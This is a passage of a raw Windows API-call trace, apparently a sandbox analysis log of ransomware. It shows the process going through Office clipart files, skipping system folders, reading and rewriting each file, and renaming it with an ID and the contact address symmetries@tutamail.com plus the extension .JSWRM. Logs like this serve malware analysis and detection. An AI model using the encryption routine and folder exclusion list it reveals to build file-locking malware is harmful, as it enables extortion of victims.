Office\\root\\CLIPART\\PUB60COR\\J0185806.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185806.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0086.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0086.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0086.738] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb1606f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb1606f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb1606f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8b8e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0185818.WMF", cAlternateFileName="")) returned 1 [0086.738] lstrcmpiW (lpString1="J0185818.WMF", lpString2=".") returned 1 [0086.739] lstrcmpiW (lpString1="J0185818.WMF", lpString2="..") returned 1 [0086.739] lstrcmpiW (lpString1="J0185818.WMF", lpString2="...") returned 1 [0086.739] lstrcmpiW (lpString1="J0185818.WMF", lpString2="windows") returned -1 [0086.739] lstrcmpiW (lpString1="J0185818.WMF", lpString2="recovery") returned -1 [0086.739] lstrcmpiW (lpString1="J0185818.WMF", lpString2="perflogs") returned -1 [0086.739] lstrcmpiW (lpString1="J0185818.WMF", lpString2="documents and settings") returned 1 [0086.739] lstrcmpiW (lpString1="J0185818.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.739] lstrcmpiW (lpString1="J0185818.WMF", lpString2="system volume information") returned -1 [0086.739] lstrcmpiW (lpString1="J0185818.WMF", lpString2="msocache") returned -1 [0086.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0086.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185818.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185818.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0185818.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0086.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0086.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185818.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185818.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0185818.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0086.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0086.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0086.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0086.739] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185818.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185818.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.740] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=35726) returned 1 [0086.740] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8b80) returned 0x24d210 [0086.741] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8b80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x8b80, lpOverlapped=0x0) returned 1 [0086.744] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.744] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8b80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x8b80, lpOverlapped=0x0) returned 1 [0086.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.745] CloseHandle (hObject=0x314) returned 1 [0086.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0086.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0086.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0086.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0086.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0086.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0086.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0086.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0086.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.745] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185818.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185818.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185818.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185818.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0086.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0086.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0086.746] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb1606f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb1606f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb1606f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0185828.WMF", cAlternateFileName="")) returned 1 [0086.746] lstrcmpiW (lpString1="J0185828.WMF", lpString2=".") returned 1 [0086.746] lstrcmpiW (lpString1="J0185828.WMF", lpString2="..") returned 1 [0086.746] lstrcmpiW (lpString1="J0185828.WMF", lpString2="...") returned 1 [0086.746] lstrcmpiW (lpString1="J0185828.WMF", lpString2="windows") returned -1 [0086.746] lstrcmpiW (lpString1="J0185828.WMF", lpString2="recovery") returned -1 [0086.746] lstrcmpiW (lpString1="J0185828.WMF", lpString2="perflogs") returned -1 [0086.746] lstrcmpiW (lpString1="J0185828.WMF", lpString2="documents and settings") returned 1 [0086.746] lstrcmpiW (lpString1="J0185828.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.747] lstrcmpiW (lpString1="J0185828.WMF", lpString2="system volume information") returned -1 [0086.747] lstrcmpiW (lpString1="J0185828.WMF", lpString2="msocache") returned -1 [0086.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0086.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185828.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185828.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0185828.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0086.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0086.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185828.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185828.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0185828.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0086.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0086.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0086.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0086.747] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185828.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185828.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.748] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7796) returned 1 [0086.748] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e70) returned 0x205850 [0086.748] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1e70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1e70, lpOverlapped=0x0) returned 1 [0086.751] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.751] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1e70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1e70, lpOverlapped=0x0) returned 1 [0086.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0086.752] CloseHandle (hObject=0x314) returned 1 [0086.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0086.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0086.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0086.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0086.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0086.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0086.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0086.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0086.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.752] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185828.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185828.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185828.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185828.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0086.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0086.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0086.753] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb1606f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb1606f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb1606f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2182, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0185834.WMF", cAlternateFileName="")) returned 1 [0086.753] lstrcmpiW (lpString1="J0185834.WMF", lpString2=".") returned 1 [0086.753] lstrcmpiW (lpString1="J0185834.WMF", lpString2="..") returned 1 [0086.753] lstrcmpiW (lpString1="J0185834.WMF", lpString2="...") returned 1 [0086.753] lstrcmpiW (lpString1="J0185834.WMF", lpString2="windows") returned -1 [0086.753] lstrcmpiW (lpString1="J0185834.WMF", lpString2="recovery") returned -1 [0086.753] lstrcmpiW (lpString1="J0185834.WMF", lpString2="perflogs") returned -1 [0086.753] lstrcmpiW (lpString1="J0185834.WMF", lpString2="documents and settings") returned 1 [0086.753] lstrcmpiW (lpString1="J0185834.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.753] lstrcmpiW (lpString1="J0185834.WMF", lpString2="system volume information") returned -1 [0086.753] lstrcmpiW (lpString1="J0185834.WMF", lpString2="msocache") returned -1 [0086.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0086.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185834.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185834.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0185834.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0086.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0086.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185834.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185834.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0185834.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0086.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0086.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0086.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0086.754] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185834.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185834.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.754] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8578) returned 1 [0086.754] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2180) returned 0x205850 [0086.754] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x2180, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x2180, lpOverlapped=0x0) returned 1 [0086.757] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.758] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2180, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x2180, lpOverlapped=0x0) returned 1 [0086.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0086.758] CloseHandle (hObject=0x314) returned 1 [0086.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0086.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0086.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0086.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0086.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0086.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0086.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0086.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0086.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0086.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0086.758] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185834.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185834.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185834.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185834.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0086.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0086.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0086.759] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb1606f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb1606f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb1606f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x37e4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0185842.WMF", cAlternateFileName="")) returned 1 [0086.759] lstrcmpiW (lpString1="J0185842.WMF", lpString2=".") returned 1 [0086.759] lstrcmpiW (lpString1="J0185842.WMF", lpString2="..") returned 1 [0086.759] lstrcmpiW (lpString1="J0185842.WMF", lpString2="...") returned 1 [0086.759] lstrcmpiW (lpString1="J0185842.WMF", lpString2="windows") returned -1 [0086.759] lstrcmpiW (lpString1="J0185842.WMF", lpString2="recovery") returned -1 [0086.759] lstrcmpiW (lpString1="J0185842.WMF", lpString2="perflogs") returned -1 [0086.759] lstrcmpiW (lpString1="J0185842.WMF", lpString2="documents and settings") returned 1 [0086.759] lstrcmpiW (lpString1="J0185842.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.759] lstrcmpiW (lpString1="J0185842.WMF", lpString2="system volume information") returned -1 [0086.759] lstrcmpiW (lpString1="J0185842.WMF", lpString2="msocache") returned -1 [0086.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0086.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185842.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 